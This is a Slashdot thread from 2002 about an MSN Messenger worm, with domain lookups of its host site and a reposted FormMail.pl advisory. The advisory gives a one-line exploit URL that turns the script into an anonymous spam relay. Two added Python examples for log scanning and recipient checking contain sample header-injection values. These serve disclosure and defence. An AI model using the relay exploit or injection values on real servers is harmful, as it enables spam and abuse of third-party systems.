  30. It's only a matter of time... by Max+the+Merciless · · Score: 4, Insightful

    until someone unleashes a virus that does some serious damage. If I was a "terrorist" hell bent on punishing the Western world for whatever perceived sins, I'd be learning how to make, or hiring programmers, to unleash a truly destructive virus.

    It's been said many times before, but I'll say it again, any monoculture is far more vulnerable to attack than a diverse system. Relying on one system, be it Microsoft or even Linux, is foolish.

    The destruction of the Microsoft monopoly is not just a matter of helping improve competition, it is a serious security matter. No amount of campaign donations or legal semantics should distract the government from its task of providing security.

    --
    * * Always question "the National Interest" - 9 times out of 10 it is a cover for evil
    1. Re:It's only a matter of time... by Anonymous Coward · · Score: 0

      Get real!

    2. Re:It's only a matter of time... by Cro+Magnon · · Score: 1

      One advantage of Linux is that it ISN'T a monoculture. If you write a virus/worm/exploit for OutHouse Express, you know it's on all 200 million Doze machines. If you write an exploit for Konqueror, it won't bother that RedHatter with the "KDE sux" tee-shirt. Depending on the software installed, a RedHat specific worm might not do diddly to a Slack box.

      --
      Slow down, cowboy! It has been 4 hours since you last posted. You must wait another few hours.
  31. Re:No DNS Record? (Geeky Observations) by Anonymous Coward · · Score: 0

    $ whois masenko-media.net

  32. It's a microsoft ruse! by SweetAndSourJesus · · Score: 0

    Fired up Messenger for the first time ever, just hoping I get to see this. It's all a microsoft conspiracy to get slashdotters using their product.

    --
    the strongest word is still the word "free"
  33. worm primer by elbobo · · Score: 2, Interesting

    just gave it a go, and it didn't affect me. running winxp with netcaptor browser (embeds ie) and trillian (im client that connects to the msn messenger network among others)

    not that i was expecting it to work.

    what amuses me though, is how the linked page from this article reads like a very handy worm writing primer, suggesting better propagation methods -

    Optimized scanning routines, hitlist scanning, and permutation scanning can be combined to produce hyper virulent Warhol Worms. Since they are so fast, such worms would be the vehicle of choice for delivering malicious payloads to the net at large.

    1. Re:worm primer by kyhwana · · Score: 1

      Netcaptor. Hmm, looks interesting.
      Ohwait, $30US for tabs in IE.
      WOW! When you can get the same for mozilla and opera for free. Windows users must really be suckers.

      --
      My email addy? should be easy enough.
    2. Re:worm primer by elbobo · · Score: 1

      mozilla still has its quirks that disqualify it as a day to day browser for me. but don't fret - i check every release, and the latest has come very close to replacing netcaptor. there's more to netcaptor than just tabbed browsing though.

    3. Re:worm primer by filmcritic · · Score: 0

      Yes! You can have that bloated, buggy, next-to-dead mozilla hunk of shit and have it bring down the entire OS when it crashes. Linux users really have to love running that kind of stuff because its FREE!!!! CmdrTaco sez: "you get what you pay for"

  34. This is dumber than a mail worm by J.D.+Hogg · · Score: 3, Insightful
    I would be impressed to see a worm silently infect your machine and try to infect your contacts. But this one asks you to *click a url* ?? Anybody who doesn't dismiss a message with a URL or an attachment from somebody they don't know, whether it's in an instant message or an email, deserves to be infected (and also should have their computers taken away from them and a flyer explaining them why they shouldn't talk to strangers in the street given to them instead).

    But /. is right, it is a Warhol virus : all the posters who reported this non-news got their 15 minutes of fame on Slashdot.

    1. Re:This is dumber than a mail worm by joemiah · · Score: 2, Informative

      It spreads through your contacts, so the recipients are more than likely receiving the URL from someone they know.

    2. Re:This is dumber than a mail worm by CrayzyJ · · Score: 2, Informative

      "somebody they don't know"

      It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever.

      --
      Holy s-, it's Jesus!
    3. Re:This is dumber than a mail worm by J.D.+Hogg · · Score: 2
      "It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever."

      Ah yes, I didn't see that, my fault. Still though, I got emails from friends with a strange vague "Go there it's cool" line, and that sounded odd enough that I didn't open them (i.e. it didn't sound like it came from that person, and even if it could have, it was too impersonal to be true). Turned out to be from an Outlook virus when I checked later.

    4. Re:This is dumber than a mail worm by LPetrazickis · · Score: 1, Insightful

      a flyer explaining them why they shouldn't talk to strangers in the street given to them instead

      What's wrong with talking to strangers? I have not ended up in a dark van as of yet. :)

      --
      Is this a sigs-optional kind of place? 'Cause I am totally down with that if you know what I mean.
    5. Re:This is dumber than a mail worm by Anonymous Coward · · Score: 0

      This particular system may be dumb, but for the sake of it let's think out of the box a little, if you can get at someone's email addresses etc. just by writing a simple script on a web page what's to stop people doing the same thing on their home pages, or even big businesses. You're not going to know it's happening and they could be up to anything they wanted.

      Browsing the web would become a lot more interesting if that was the case don't you think ;)

    6. Re:This is dumber than a mail worm by matrix29 · · Score: 1

      I would be impressed to see a worm silently infect your machine and try to infect your contacts. But this one asks you to *click a url* ??

      Which brings up this obvious chuckle...

      This is an Amish computer virus. Please pass this message along then format your hard drives. Thank you.

      --
      "Face it, a nation that maintains a 72% approval rating on George W. Bush is a nation with a very loose grip on reality.
  35. Not that URL by phliar · · Score: 2
    Was that just an example URL?


    GET /cool.html HTTP/1.1
    Host: www.masenko-media.net
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Win32)

    HTTP/1.1 404 Not Found
    Date: Thu, 14 Feb 2002 00:07:30 GMT
    Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8 PHP/4.0.6 DAV/1.0.2 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <HTML><HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD><BODY>
    <H1>Not Found</H1>
    The requested URL /cool.html was not found on this server.<P>
    <P>Additionally, a 404 Not Found
    error was encountered while trying to use an ErrorDocument to handle the request.
    <HR>
    <ADDRESS>Apache/1.3.20 Server at www.masenko-media.net Port 80</ADDRESS>
    </BODY></HTML>

    (No Micros**t anywhere on these machines. Cheers!)

    --
    Unlimited growth == Cancer.
    1. Re:Not that URL by Anonymous Coward · · Score: 0

      FrontPage/5.0.2.2510 FrontPage == Microsoft;

    2. Re:Not that URL by jonnythan · · Score: 1

      I believe he meant no Microsoft products on his own computer, so he could follow the link without fear.

    3. Re:Not that URL by Saint+Nobody · · Score: 2
      Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8

      hmmm.... well, i'm not really familiar with mod_bwlimited, but it sounds like a module for limiting the bandwidth used by certain pages. (correct me if i'm being an idiot.)

      assuming i'm right, this really wasn't the place to put virus code. even though it's only a smallish html document, all the hits you can get from a virus would really add up. so you've already limited the spread of the virus. although, i'd bet it's just free web space, and <aphorism>beggars can't be choosers</aphorism>

      --
      #define F(x) int main(){printf(#x,10,#x);}
      F(#define F(x) int main(){printf(#x,10,#x);}%cF(%s))
    4. Re:Not that URL by Anonymous Coward · · Score: 0

      Then why all the server replies? What's the point?

    5. Re:Not that URL by Anonymous Coward · · Score: 0

      Check this: FrontPage/5.0.2.2510

  36. 404 error by skt · · Score: 1
    I suggest not following the link.

    hmm, I went to that link and got a 404 error.. nothing to worry about if you use mozilla, but how can this do something bad to IE? Did they take the page down?

    1. Re:404 error by csmiller · · Score: 1

      They could use the Browse-ID string to send back a 404 to non-MS browsers. Anyone brave enough to try this on a MS browser, or change their browser's ID string to check?

      However, a reputable ISP would remove any account (homepage/email etc) used for spamming/virus attacks. I haven't checked the site myself (using a Uni's Win2000 box, with MSN messenger installed), and don't want to get into trouble for knowingly releasing it on their machines.

      --
      It has become appallingly obvious that our technology has exceeded our humanity. --- Albert Einstein
    2. Re:404 error by thilmony · · Score: 1

      funnier yet, the 404 I get shows:

      Apache/1.3.20 Server at www.masenko-media.net Port 80

      --
      YES, there is a McDonald's in Hanoi Square.
  37. Re:No DNS Record? (Geeky Observations) by bovinewasteproduct · · Score: 5, Informative

    You might try just the domain name. Which comes out to:
    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02
    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696
    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

    Looks fine to me..:)

    BWP

  38. Read my post, nuff said by (startx) · · Score: 1

    mbrennek@spaceheater:~$ host www.masenko-media.net
    www.masenko-media.net. is an alias for masenko-media.net.
    masenko-media.net. has address 66.96.247.55
    mbrennek@spaceheater:~$ whois masenko-media.net

    Whois Server Version 1.3

    Domain names in the .com, .net, and .org domains can now be registered
    with many different competing registrars. Go to http://www.internic.net
    for detailed information.

    Domain Name: MASENKO-MEDIA.NET
    Registrar: GO DADDY SOFTWARE, INC.
    Whois Server: whois.godaddy.com
    Referral URL: http://registrar.godaddy.com
    Name Server: NS1.NETCRATER.COM
    Name Server: NS2.NETCRATER.COM
    Updated Date: 06-feb-2002

    >>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

    The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
    Registrars.

    Found InterNIC referral to whois.godaddy.com.

    The data contained in Go Daddy Software, Inc.'s WHOIS database,
    while believed by the company to be reliable, is provided "as is"
    with no guarantee or warranties regarding its accuracy. This
    information is provided for the sole purpose of assisting you
    in obtaining information about domain name registration records.
    Any use of this data for any other purpose, including, but not
    limited to, allowing or making possible dissemination or
    collection of this data in part or in its entirety for any
    purpose, such as the transmission of unsolicited advertising and
    solicitations, is expressly forbidden without the prior written
    permission of Go Daddy Software, Inc. By submitting an inquiry,
    you agree to these terms of usage and limitations of warranty.

    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02

    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696
    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

    other crap added below to avoid "postercomment" compression filter, because obviously compression isn't a way to catch the real trolls, since it caught me, but hasn't caught the ascii art already attached to the story. 45908-6230569laksdflkjn ;l34j65] lksdjflkaj -908ausdfg0 oi;3lkj4;6lkn3 56;o38tusap[df8u opsiajd ;alskdjtl3k4jl5kj345;1l 4jlwkjf l;kj a
    Hope that's enough to get it through the filter this time.

  39. Re:No DNS Record? (Geeky Observations) by Anonymous Coward · · Score: 0

    How about using whois correctly?

    $ whois masenko-media.net
    [whois.crsnic.net]

    Whois Server Version 1.3

    Domain names in the .com, .net, and .org domains can now be registered
    with many different competing registrars. Go to http://www.internic.net
    for detailed information.

    Domain Name: MASENKO-MEDIA.NET
    Registrar: GO DADDY SOFTWARE, INC.
    Whois Server: whois.godaddy.com
    Referral URL: http://registrar.godaddy.com
    Name Server: NS1.NETCRATER.COM
    Name Server: NS2.NETCRATER.COM
    Updated Date: 06-feb-2002

    >>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

    and then if you ask specifically from that registrar:


    [whois.godaddy.com]
    The data contained in Go Daddy Software, Inc.'s WHOIS database,
    while believed by the company to be reliable, is provided "as is"
    with no guarantee or warranties regarding its accuracy. This
    information is provided for the sole purpose of assisting you
    in obtaining information about domain name registration records.
    Any use of this data for any other purpose, including, but not
    limited to, allowing or making possible dissemination or
    collection of this data in part or in its entirety for any
    purpose, such as the transmission of unsolicited advertising and
    solicitations, is expressly forbidden without the prior written
    permission of Go Daddy Software, Inc. By submitting an inquiry,
    you agree to these terms of usage and limitations of warranty.

    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02

    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696
    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

  40. Re:No DNS Record? (Geeky Observations) by The+Salamander · · Score: 1

    Your WHOIS must suck:

    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02

    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696
    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

  41. One shoe drops by Anonymous Coward · · Score: 5, Interesting
    Well, this is one of a number of Damoclean swords hanging over the Net. A couple of other widely predicted "what if..?"s have already come to pass: Nimda was the first successful implementation of one, attacking through multiple vulnerabilities; others would include yesterday's SNMP freakout, the separate possibility of routing protocol attacks, yadda yadda, oh look... you all read bugtraq|incidents|nanog, et al., and know the score, and are presumably not very vulnerable. (Although one especially interesting aspect of this and other worms is that it defeats the security posture that says "take yourself out of the top 10% of easy sites to break into [by, eg., ONLY implementing the SANS top 10/20 fixes] and the kiddies will pass you by". If you're vulnerable, you WILL be hit. ) "But I haven't got anything worth taking, why would anyone want to crack me?" *sigh*...


    The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.


    Don't believe me? check out the IIS curve at Netcraft . What happened after Nimda and Code Red? IIS usage INCREASED.

    Mebbe I'm just bitter cos I've been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)

    Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
    It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.

    1. Re:One shoe drops by Anonymous Coward · · Score: 0

      You sound like you're actually suggesting that someone write one. Course if everyone dropped IIS/IE tomorrow, 25 bugs in Apache/Netscape would be found and exploited overnight. Methinks you haven't actually formulated any real thoughts about the subject and what the solutions might be...

    2. Re:One shoe drops by rjamestaylor · · Score: 5, Insightful
      • Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.
      IT purchasing decisions are made by people who are insulated from these problems but not from IT advertising. Ergo, this kind of problem has little to no effect on the IT market.
      --
      -- @rjamestaylor on Ello
    3. Re:One shoe drops by Anonymous Coward · · Score: 0

      Windows is the best product for businesses. They'd switch if there were an alternative. Businesses hire dumb people, they're cheaper. Dumb people can use Windows, little or no training required. Lots of dummies means a large base of software available.

      IMO... Apple's OS X is the ticket. Dummies can use it and it's a fairly secure package. Sadly, it costs too much for the business drones and the software base isn't there yet. You want things to change? Go out and buy an Apple G4 and run OS X. You can live MicroSoft free, at least at home. Don't support them, don't run their crap. Maybe at work you don't have a choice, but at home you do.

    4. Re:One shoe drops by tranman · · Score: 1

      Actually, you've got it wrong. Window server popularity is continuing to decline it's just that you can't see it because unlike stock prices - which react to opinion in realtime, purchasing and install happens in bloated corporation time. All these problems will hurt windows sales in two years. Which is why Microsoft is working its ass off to staunch the bleeding. The problem is that because of the way it develops software, it has more holes in its code than in a heroin junkie's arm.
      And it's not that they developed it badly. It's just that it's been cost effective to not exhaustively test and not exhaustively design. With these security problems everywhere, and with potential lost sales -- this has to change.

    5. Re:One shoe drops by filmcritic · · Score: 0

      Well, this is one of a number of Damoclean swords hanging over the Net.

      Perhaps all the "sky is falling" people could be a bit quick on the trigger. Everyone thinks that virii and worms are/will be the downfall of the internet. The internet is much more resilient than people think, for one major reason: the people behind it. The people that run the servers online know what to do when business needs require a server to be up and running. They don't have time to fiddle and play around with the thing just to say they fixed it the RIGHT way (like good linux users do).

      ..nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts..

      You know what those folks will do if that happens? Suck it up and start over from scratch. There's nothing else to do. Reformat/reinstall, believe it or not, happens a lot. It's just more cost effective than correcting all the damage. Businesses exist to make money, not lose it. I know this is pretty radical to those who think everything should be given away.

      The real world is quite an eye opening experience for those sitting behind the jaded curtain of linux. The author mentioned he's trying to get into the IS world and getting nowhere due to the lack of MCSE, etc certs. Yep, that's how it is. Like it or not, if you want to stand a better chance of scoring a job, you better know microsoft and have the certs because most businesses use MS internally, and they want to see certification. It's nice to see businesses who will take a chance on someone who doesn't have all the credentials, but those are few.

      To finish...the sky isn't falling, the internet will go on. Crackers and script kiddies will never stop trying, but they won't break it. Think "real world" and you'll feel better.

  42. Re:No DNS Record? (Geeky Observations) by Anonymous Coward · · Score: 0

    whois is for domain names, not host names. Removing the www gives the correct info.

    whois masenko-media.net
    [whois.crsnic.net]

    Whois Server Version 1.3

    Domain names in the .com, .net, and .org domains can now be registered
    with many different competing registrars. Go to http://www.internic.net
    for detailed information.

    Domain Name: MASENKO-MEDIA.NET
    Registrar: GO DADDY SOFTWARE, INC.
    Whois Server: whois.godaddy.com
    Referral URL: http://registrar.godaddy.com
    Name Server: NS1.NETCRATER.COM
    Name Server: NS2.NETCRATER.COM
    Updated Date: 06-feb-2002

    >>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

    The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
    Registrars.

    [whois.godaddy.com]
    The data contained in Go Daddy Software, Inc.'s WHOIS database,
    while believed by the company to be reliable, is provided "as is"
    with no guarantee or warranties regarding its accuracy. This
    information is provided for the sole purpose of assisting you
    in obtaining information about domain name registration records.
    Any use of this data for any other purpose, including, but not
    limited to, allowing or making possible dissemination or
    collection of this data in part or in its entirety for any
    purpose, such as the transmission of unsolicited advertising and
    solicitations, is expressly forbidden without the prior written
    permission of Go Daddy Software, Inc. By submitting an inquiry,
    you agree to these terms of usage and limitations of warranty.

    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02

    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696
    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

  43. Another site by Anonymous Coward · · Score: 0

    http://www.angelfire.com/zine2/me1 . It appears to launch a fake error page.

  44. formmail.pl by TheFlu · · Score: 5, Informative

    Just an FYI about the lack of security on older versions of formmail.pl. You should replace the exploitable version, if you are using it yourself.

    Formmail.pl Can Be Used As An Open Mail Relay

    Summary
    The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable hosts as mail relays.
    This vulnerability has already been exploited by spammers in many installations of Formmail.pl.

    Details
    Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program to distribute their email (SPAM).

    Exploit:
    A URL such as the following:
    http://www.example.com/cgi-bin/FormMail.pl?recipient=email@address-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam.

    Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.

    Workaround:
    1. Remove your formmail.pl script until the author provides a fix.
    or:
    2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.

    1. Re:formmail.pl by vtweb · · Score: 1

      There are active search-bots, hunting for instances of formmail.pl on random domains, and testing them for open relays. Check your serverlogs, and you will find that the test request has the URL being tested repeated within the subject, so the email discovering a vulnerable script delivers the URL for further exploits.

      Renaming formmail.pl to anything else, such as formsender.pl, will thwart most of these
      search-and-exploit processes.
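The log check described in the comment above, as an added example that is not part of the original thread: it scans web server access logs for FormMail requests that name an outside recipient or echo the script's own URL in the subject. The log lines, hostnames and addresses are constructed, and `classify` and `scan` are hypothetical helper names.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample: Apache combined-format lines, documentation-range addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Feb/2002:10:01:02 +0000] "GET /cgi-bin/formmail.pl?recipient=probe%40mailbox.example&subject=http%3A%2F%2Fwww.site.example%2Fcgi-bin%2Fformmail.pl&message=test HTTP/1.0" 404 287 "-" "-"
192.0.2.10 - - [14/Feb/2002:10:01:03 +0000] "GET /cgi-bin/FormMail.pl?recipient=probe%40mailbox.example&subject=www.site.example/cgi-bin/FormMail.pl HTTP/1.0" 200 512 "http://www.site.example/" "-"
198.51.100.7 - - [14/Feb/2002:10:05:00 +0000] "POST /cgi-bin/FormMail.pl HTTP/1.1" 200 640 "http://www.site.example/contact.html" "Mozilla/4.0"
203.0.113.5 - - [14/Feb/2002:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
198.51.100.9 - - [14/Feb/2002:10:07:00 +0000] "GET /cgi-bin/formmail.pl?recipient=webmaster%40site.example&subject=hello HTTP/1.1" 200 300 "-" "Mozilla/4.0"
"""

# client, timestamp, method, request target, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Any path ending in formmail.pl or formmail.cgi, whatever the capitalisation.
SCRIPT_RE = re.compile(r"/formmail\.(?:pl|cgi)$", re.IGNORECASE)


def classify(line, site_host, local_domains):
    """Return a finding dict for a suspicious FormMail request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, method, target, status = m.groups()
    parts = urlsplit(target)
    if not SCRIPT_RE.search(parts.path):
        return None

    # parse_qs also undoes the percent-encoding (%40 -> @, %2F -> /).
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []

    # Recipients outside the domains this form is meant to serve.
    recipients = [r.strip() for v in params.get("recipient", [])
                  for r in v.split(",") if r.strip()]
    if any(r.rpartition("@")[2].lower() not in local_domains for r in recipients):
        reasons.append("external-recipient")

    # The tell from the comment: the tested URL repeated inside the subject,
    # so that a delivered mail reports which script is usable.
    subject = " ".join(params.get("subject", [])).lower()
    if site_host.lower() in subject and parts.path.lower() in subject:
        reasons.append("self-url-in-subject")

    if not reasons:
        return None
    return {
        "client": client,
        "when": when,
        "path": parts.path,
        "status": int(status),
        # 200 only shows the script exists and ran, not that mail went out.
        "script_answered": status == "200",
        "reasons": reasons,
    }


def scan(log_text, site_host, local_domains):
    """Classify every line of an access log and return the findings."""
    findings = []
    for line in log_text.splitlines():
        hit = classify(line, site_host, local_domains)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, "www.site.example", {"site.example"}):
        print(f["client"], f["status"], f["path"], ",".join(f["reasons"]))
```

A POST submission leaves no parameters in the access log, so this only catches GET-style requests; a 404 finding means the script was looked for but is not installed under that name.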

    2. Re:formmail.pl by Anonymous Coward · · Score: 0

      There is a fix in the latest version of FormMail.pl. It only allows mail to be sent to domains that are configured into the script's config lines.

      Although I wouldn't recommend using this script to begin with. <?php mail($duh, $duh, $duh); ?> PHP is a good thing.

    3. Re:formmail.pl by proub · · Score: 1

      Workaround 3:

      Replace FormMail.PL with the more-secure, more-robust drop-in replacement from the nms-cgi project. Still free, same config variables, just works better.

      Disclaimer: I'm a contributor to the project, FormMail.PL in particular.

      -paul

      --
      "Irony is so September 10th"
      Matt Miller, alt.fan.spinnwebe
    4. Re:formmail.pl by brain159 · · Score: 1

      *nod*, I've noticed this recently (don't have formmail.pl on my site, but I check up on 404s in my logs out of habit), and I posted bits above. now I'll tip off the nice support dude at my cheap webhost company I use so they can't claim not to know...

    5. Re:formmail.pl by Anonymous Coward · · Score: 0

      DUDE, nms rawks, formmail.pl and matt's dicks sucxors

    6. Re:formmail.pl by babbage · · Score: 2

      That, or replace the script with the drop-in replacements being offered by NMS. The scripts they're developing, including one that does FormMail.pl's job, are professionally developed versions of Matt Wright's scripts but with much better security & robustness, while not requiring you to install any other libraries or do any setup more advanced than setting a few variables at the top of the script. Good stuff.

    7. Re:formmail.pl by babbage · · Score: 3, Informative
      As I understand it, Matt Wright has indicated that he doesn't have much interest in updating his old software anymore, so "official" bugfixes are unlikely to be forthcoming. As another commenter noted, the NMS group is working on a suite of drop-in replacements for each of the scripts that Matt wrote years ago, and among them is a very good replacement for FormMail.pl. These newer scripts are being developed with security and robustness in mind from the ground up.

      Even in cases where it might be safer & more efficient to use libraries from CPAN, the NMS group has deliberately decided to not make use of these libraries, so that novice developers could make use of these more reliable scripts without having to perform any configuration more advanced than setting a few variables and writing a little bit of HTML (which, presumably, they'll be more comfortable with anyway).

      Exploits like this are exactly why people should migrate the old Matt Wright code to NMS, which can be dropped in and up & running very quickly. It's easy, and it's much safer. It's the right thing to do.

    8. Re:formmail.pl by shogun · · Score: 2

      I've had the same problem with a FormMail.pl installed around here. It already had the referer check etc in it but that wasn't enough as you've stated above. What I ended up doing was putting in a recipient check, the script is only meant to be used by local (to the domain) people so they can get feedback from their webpages so I just made sure that the recipient was in the format of *@. Spammers would only be likely to be able to use the script in the tiny percentage of cases where their spam victims' addresses happen to be in this domain.
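A recipient check of the kind described in the comment above, together with workaround 2 from the parent post, as an added example that is not part of the original thread and is not code from FormMail.pl or nms. It sets a loose substring test beside a whole-string allowlist test; the domain, the addresses and all function names are assumptions made for illustration.

```python
import re

ALLOWED_DOMAINS = {"site.example"}          # assumption: the one domain the form serves
FIXED_RECIPIENT = "feedback@site.example"   # workaround 2: address set by the admin

# One address, matched against the whole string. \A and \Z leave no room for
# a second address, a comma-separated list or an embedded line break.
_ADDR = re.compile(r"\A[A-Za-z0-9._+-]+@([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)\Z")


def naive_check(recipient):
    """Loose '*@domain' test: true if '@domain' appears anywhere in the value."""
    return any(re.search("@" + re.escape(d), recipient, re.IGNORECASE)
               for d in ALLOWED_DOMAINS)


def strict_check(recipient):
    """Accept exactly one address whose full domain is on the allowlist."""
    if not isinstance(recipient, str) or len(recipient) > 254:
        return False
    m = _ADDR.match(recipient)
    return bool(m) and m.group(1).lower() in ALLOWED_DOMAINS


def choose_recipient(form, hardcode=True):
    """Decide where the mail goes, or return None to refuse the request.

    The Referer header is deliberately not consulted: the client supplies it,
    so it says nothing about where the submission really came from.
    """
    if hardcode:
        return FIXED_RECIPIENT            # the form's own field is ignored
    value = form.get("recipient", "")
    return value if strict_check(value) else None


# Constructed inputs: one legitimate value, then values a loose test lets through.
SAMPLES = [
    "webmaster@site.example",
    "someone@elsewhere.example,x@site.example",       # list smuggled into one field
    "someone@elsewhere.example\nBcc: x@site.example",  # line break inside the value
    "x@site.example.elsewhere.example",                # allowed name used as a prefix
    "someone@elsewhere.example",
]


def audit(samples=SAMPLES):
    """Return (value, naive result, strict result) for each sample."""
    return [(s, naive_check(s), strict_check(s)) for s in samples]


if __name__ == "__main__":
    for value, naive, strict in audit():
        print(f"{value!r:55} naive={naive!s:5} strict={strict}")
```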

    9. Re:formmail.pl by zeugma-amp · · Score: 1

      Interesting. I just looked through the past few days worth of errorlogs that I have on hand, and find nothing for formmail.pl, but did see 4601 requests for cmd.exe

      --
      This is an ex-parrot!
    10. Re:formmail.pl by Anonymous Coward · · Score: 0

      The author has provided a fix for your accusation that it can be used as an open mail relay. August 3, 2001, version 1.9. It includes a way to restrict recipients of the e-mail based on regular expressions.

      http://www.worldwidemart.com/scripts/

    11. Re:formmail.pl by Anonymous Coward · · Score: 0

      Matt has updated his script in August of last year after a website I host (dailywav.com) was barraged with tons of attempts to spam through it.

      I diagnosed the problem and forwarded the results into him. His latest version 1.9 fixes the issue in the FormMail CGI script, but most ISPs (mine included) aren't interested in fixing it so they leave it.

      My version of the script just ignores attempts whereas Matt's politely denies them.

  45. Re:No DNS Record? (Geeky Observations) by suwain_2 · · Score: 0
    Actually... My DNS doesn't suck, it's me. :-[

    I, in my stupidity, kept the "www." on the front, even though it shouldn't have been. :)

    --
    ________________________________________________
    suwain_2 :: quality slashdot p
  46. Re:Well, that's one less effectual site for vector by JDizzy · · Score: 3, Interesting

    Somebody mod this parent as "funny", or "underrated" because the author has a point, the slashdot effect should suffice to kill any of the infection sites, and with a high degree of impact.

    --
    It isn't a lie if you belive it.
  47. Re:Gee... by woodstok · · Score: 0, Flamebait

